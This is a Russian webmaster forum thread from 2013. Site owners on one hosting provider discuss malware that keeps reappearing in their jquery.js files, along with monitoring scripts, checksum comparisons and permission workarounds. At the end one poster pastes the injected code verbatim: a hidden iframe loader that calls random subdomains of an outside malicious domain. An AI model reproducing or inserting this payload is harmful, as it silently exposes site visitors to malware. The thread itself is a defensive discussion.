secline

secline
Рейтинг
18
Регистрация
25.10.2012
895553

Я 2 дня ждал, и наконец дождался) Ура!) Вирус снова появился на сайте)) А точнее в файле jquery.js ;)

Почему радуюсь, да потому что мне предложили эксперимент, который заключается в том что меняют все пароли в панель управления и к FTP, и их никто незнает, 2 дня я сидел без доступа к сайту так сказать, и вот чудо вирусный код снова появился) Тем самым они видимо хотели исключить вероятность заражения моего компа чтоли ;)

File: /home/***/domains/***/public_html/templates/theme/jquery.js
New filesize: 92767
Old filesize: 91671
New file content..
CHMOD: -rw-r--r--

Доступ вернули, вирус почистил, хостер к концу недели обещает разобраться с этой проблемой.

Sergsap:
Мне еще два дня назад вот что писали:
мы приняли решение проводить ежедневные проверки серверов хостинга на предмет возникновения подобных проблем, чтобы обеспечить обнаружение заражений ДО того, как это будет сделано поисковыми системами или организациями по борьбе с распространением Malware, т.е. действовать на опережение, тем самым - обеспечивая безопасность от подобных проблем для Вас.

Вот мне тож самое написали) Слово в слово)

Sergsap:
Они наверное форум покурили, и поставили два скрипта - один мониторит, второй вырезает вредоносный кусок, ибо пока код легко палится ))

Мне тоже так кажется, ну или начали лечение своих серверов.

---------- Добавлено 05.09.2013 в 01:22 ----------

alzor:
Пока хостер чухается дополнительно опишу как мониторю по простому, может кому приходится.
Заходим по SSH. Файлы должны быть всякого вражеского кода.
сохраняем, например, утром контрольную сумму файлов с нужным расширением
find . -type f -name "*.js" -exec md5sum {} \; > file-js1.txt ну и вечером к примеру
find . -type f -name "*.js" -exec md5sum {} \; > file-js2.txt потом сверяю
diff -u file-js1.txt file-js2.txt.
к уже конкретным файлам, которые знаю что заражаются нашел такое решение: у https://www.host-tracker.com/ нашел следующую штуку:
Поставил на мониторинг конкретно файл в который пишется вирус
Http задание URL/Domain/IP: указываем путь mysite.com/pub/file.js Ключевое слово: например iframe
и галочка Инверсия ключевого слова:, теперь когда вражеский код появляется мне приходит смс и уведомление на емейл буквально через минуту (выбрал интервал опроса 1 мин).

Способ хороший, а что если пхп зальют? Что делать будете? Или поправят другой файл и пропишут в него код? Если уж мониторить то все и сразу.

hexacell:
понятно, что бред, но попробуйте это втемяшить сотрудникам техподдержки...
secline, в вашей сотне сайтов есть такие, которые хостятся на Бегет? думаю туда переезжать

нет там нету, у меня таймвеб и вдс от инферно, и забугорные хосты.

---------- Добавлено 04.09.2013 в 20:02 ----------

Появились ли у кого новые зараженные файлы? Вчера последние были, не ужели поправили?

---------- Добавлено 04.09.2013 в 20:11 ----------

kgtu5:
говорил уже - vps-server.ru аналогично, besthost еще

kgtu5 vps-server.ru хорошо работает? Зашел посмотреть на цены VPS, увидел это CentOc, это они специально наверное так, или же ошибка все же?😂

У меня около сотни сайтов на разных хостингах и впс, проблема только здесь, на хостлайфе. И то что дали ссылку это просто бред, во всей этой теме у всех проблема с файлами *.js и всем подобным вирусным кодом. А тут уже доказано что у многих пользователей хостлайфа в файл jquery.js(или подобный) вписывается в конец файла вирус.

moby1:
Название сайта moby1.ru . Я до 7 утра переписывался с техподдержкой Хостинга, но они не могут мне типа ничем помочь, типа проблема не на их стороне и порекомендовали для начала сменить права на некоторых папках и файлах. Я знаю, что код есть как минимум в 5-ти местах. Но как его удалить (из какого именно файла или папки и как именно) я не знаю .... А сегодня уже Google тоже пометил нас как сайт с вредоносным ПО.... Помогите, если можете...

В вашем случае нет вируса того что у нас, у вас что то другое, вы пробовал пользоваться AI-Bolit? Думаю он вам точно поможет. Главным смотрите файл .htaccess.

---------- Добавлено 04.09.2013 в 15:13 ----------

volkovysk:
А в Спанели или ИСПменеджере нет функций мониторинга действий изменения файлов на сайте ???

На сколько знаю вроде нету, лучше подключите отдельный скрипт.

---------- Добавлено 04.09.2013 в 15:14 ----------

devil331:
Вы больше нигде ничего не находили? а то я этот файл почистил, отправил запрос на перепроверку в яндексе вчера, сегодня захожу, пометка не снята, кнопка проверить опять появилась. Может еще где-то зараза есть?

Нет, других вирусов в системе нет уверен, после чистки jquery.js вирусов нет, яндекс уже убрал пометку, новых файлов или изменившихся файлов за все время кроме как jquery.js не было.

Если появятся новые файлы, или начнуться заливаться пхп скрипты сразу же перееду на свой VPS.

---------- Добавлено 04.09.2013 в 15:38 ----------

alzor:
После прошелся еще раз по зараженным файлам и поставил уже доступ на папку 555 и к файлу, который заражается 444, пока полет нормальный. Возможно хостер к моему тоже кое чего прикрутил. Одним словом мониторю.

У меня на всех папках стояли права 555, это не уже не мешает вирусу изменять права. Скорее всего хостер что то крутит.

alzor а может уже решили проблему попросту. Хотя хостлайф обещали отписаться в теме после решения проблемы.

Напишите что за сайт скажу в каком файле подчистить и все)) А так беспокоится думаю пока сильно не стоит, главное убрать этот код из файла и все, к концу недели хостлайф обещали разобраться с проблемой. Вроде как признав свою вину.

---------- Добавлено 04.09.2013 в 05:12 ----------

Sergsap:
secline, подскажи плиз что за скрипт chfiles. Заинтересовало. А то сервис проверки сайтов, обсуждаемый в соседней теме ниче не ловит.

/ru/forum/697566

В этой теме он обсуждается, буду дома могу ещё скинуть парочку ссылок, у меня 3 разные системы скриптов проверяют все сайты, запускаясь несколько раз в сутки по крону.

777Sharpey777:
То же заметил, сайт очень низко опустился с 3к до 1к. Сегодня то же js с правами 444 был изменен на 755.

Подскажите пожалуйста нормальный хостинг для онлайн сайта. Нет сил больше мучится с ХостЗаразой.

По поводу трафика, может и упал, не понятно, по этой ли причине, было 4к, стало 3к.

А по поводу хостера, я бы подождал ещё недельку, если ситуация не исправится то и думать о переезде, обещали до конца недели разобраться, посмотрим. А так хостер устраивает во всем, а главное скорость и стабильность за последние пол года проблем нет, особенно после перехода на SSD диски. С ними уже 1.5 года.

P.S ну вот вовремя не убрал вирусный код, яндекс уже предупреждение вывесил, прямо сил нет на них((

Скажу больше ;)

Берем сервис http://2ip.ru/domain-list-by-ip/ вбиваем свой сайт, смотрим список из десятков сайтов, открываем штук 5 сайтов, и смотрим ихние файлы jquery.js

Открыл на угад сейчас 5 сайтов, в каждом из сайтов вирусный код...😂

---------- Добавлено 03.09.2013 в 18:46 ----------

Кто не верит смотрите сами, взламываются не только популярные движки...

Вот IP адрес 46.165.222.171, показало 24 сайта, проверьте и сами все увидите ;)

Там есть сайты казино, некоторые вообще самописные, и в них зловред!) Ну что тут ещё добавить?)

На 2 сайтах из списка вы не найдете зловреда, их я уже почистил.

P.S Позже если время найду отпишусь всем этим сайтам что у них вирус на сайте, и скину ссылку на эту тему.

Ну что сказать, радовался я не долго, изменение прав с 644 на 444, и папок с 755 на 555, помогало только недели 3, сегодня изменился атрибут файла jquery.js с 444 на 755 и размер его.

Самое что интересное я создал в корне сайта своего файл sysmetvpn.php с размером 0, сегодня он удалился после внедрения кода в файл...

О чем мне с радостью поведал скрипт проверки файлов chfiles.

File: /home/user/domains/***/public_html/templates/theme/jquery.js

New filesize: 92551

Old filesize: 91671

New filetime: 03.09.2013 13:47

Old filetime: 14.12.2012 11:03

New file content..

CHMOD: -rwxr-xr-x

Deleted files:

/home/user/domains/***/public_html/sysmetvpn.php

Все на лицо. ;)

Вот мой:

var ifKiB9c = document.createElement('iframe');ifKiB9c.name = 'ifKiB9c';ifKiB9c.src = 'http://'+genstrdom(Math.floor(Math.random() * 20) + 5)+'.'+'bazeratincomers.ru/';ifKiB9c.style.width = '0px';ifKiB9c.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifKiB9c=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')[0].appendChild(ifKiB9c);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); setTimeout(function() { document.cookie = 'ifKiB9c=yes; path=/; expires=' + expiresDate; }, 5000);}};function genstrdom(length) {var st = '';var chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for (i=1;i<length;i++) {var c = Math.floor(Math.random()*chars.length + 1);st += chars.charAt(c)}return st;}
123 4
Всего: 33